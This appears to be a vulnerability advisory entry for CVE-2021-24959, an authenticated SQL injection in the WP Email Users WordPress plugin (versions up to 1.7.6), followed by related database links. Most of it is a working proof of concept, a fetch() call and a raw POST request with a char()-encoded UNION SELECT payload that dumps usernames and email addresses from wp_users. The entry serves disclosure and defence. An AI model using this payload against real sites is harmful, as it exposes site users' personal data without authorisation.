Lucene search
Krzysztof ZającWPEX-ID:0471D2E2-E759-468F-BECD-0B062F00B435HistoryJan 31, 2022 - 12:00 a.m.
WP Email Users <= 1.7.6 - Subscriber+ SQL Injection
2022-01-3100:00:00
Krzysztof Zając
93
0.001 Low
EPSS
Percentile
37.7%
The plugin does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.
As any authenticated user (such as subscriber), the request below will display all users email addresses
fetch("httsp://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"weu_selected_users_1","data_raw[]":"0 UNION SELECT concat(char(97),char(58),char(49),char(58),char(123),char(105),char(58),char(48),char(59),char(115),char(58),char(54),char(57),char(58),char(34),char(49),char(32),char(85),char(78),char(73),char(79),char(78),char(32),char(83),char(69),char(76),char(69),char(67),char(84),char(32),char(99),char(111),char(110),char(99),char(97),char(116),char(40),char(117),char(115),char(101),char(114),char(95),char(108),char(111),char(103),char(105),char(110),char(44),char(32),char(99),char(104),char(97),char(114),char(40),char(52),char(52),char(41),char(44),char(32),char(117),char(115),char(101),char(114),char(95),char(101),char(109),char(97),char(105),char(108),char(41),char(32),char(70),char(82),char(79),char(77),char(32),char(119),char(112),char(95),char(117),char(115),char(101),char(114),char(115),char(34),char(59),char(125))"}),
"method": "POST",
"credentials": "include"
})
.then(response => response.text())
.then(data => console.log(data));
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 1405
Connection: close
Cookie: [any authenticated user]
action=weu_selected_users_1&data_raw%5B%5D=0+UNION+SELECT+concat%28char%2897%29%2Cchar%2858%29%2Cchar%2849%29%2Cchar%2858%29%2Cchar%28123%29%2Cchar%28105%29%2Cchar%2858%29%2Cchar%2848%29%2Cchar%2859%29%2Cchar%28115%29%2Cchar%2858%29%2Cchar%2854%29%2Cchar%2857%29%2Cchar%2858%29%2Cchar%2834%29%2Cchar%2849%29%2Cchar%2832%29%2Cchar%2885%29%2Cchar%2878%29%2Cchar%2873%29%2Cchar%2879%29%2Cchar%2878%29%2Cchar%2832%29%2Cchar%2883%29%2Cchar%2869%29%2Cchar%2876%29%2Cchar%2869%29%2Cchar%2867%29%2Cchar%2884%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28111%29%2Cchar%28110%29%2Cchar%2899%29%2Cchar%2897%29%2Cchar%28116%29%2Cchar%2840%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28108%29%2Cchar%28111%29%2Cchar%28103%29%2Cchar%28105%29%2Cchar%28110%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%2899%29%2Cchar%28104%29%2Cchar%2897%29%2Cchar%28114%29%2Cchar%2840%29%2Cchar%2852%29%2Cchar%2852%29%2Cchar%2841%29%2Cchar%2844%29%2Cchar%2832%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%2895%29%2Cchar%28101%29%2Cchar%28109%29%2Cchar%2897%29%2Cchar%28105%29%2Cchar%28108%29%2Cchar%2841%29%2Cchar%2832%29%2Cchar%2870%29%2Cchar%2882%29%2Cchar%2879%29%2Cchar%2877%29%2Cchar%2832%29%2Cchar%28119%29%2Cchar%28112%29%2Cchar%2895%29%2Cchar%28117%29%2Cchar%28115%29%2Cchar%28101%29%2Cchar%28114%29%2Cchar%28115%29%2Cchar%2834%29%2Cchar%2859%29%2Cchar%28125%29%29Related
cvelist
cvelist
CVE-2021-24959 WP Email Users <= 1.7.6 - Subscriber+ SQL Injection
2022-03-14 14:41:05
cve
cve
CVE-2021-24959
2022-03-14 15:15:08
patchstack
patchstack
prion
prion
Sql injection
2022-03-14 15:15:00
wpvulndb
wpvulndb
WP Email Users <= 1.7.6 - Subscriber+ SQL Injection
2022-01-31 00:00:00
nvd
nvd
CVE-2021-24959
2022-03-14 15:15:08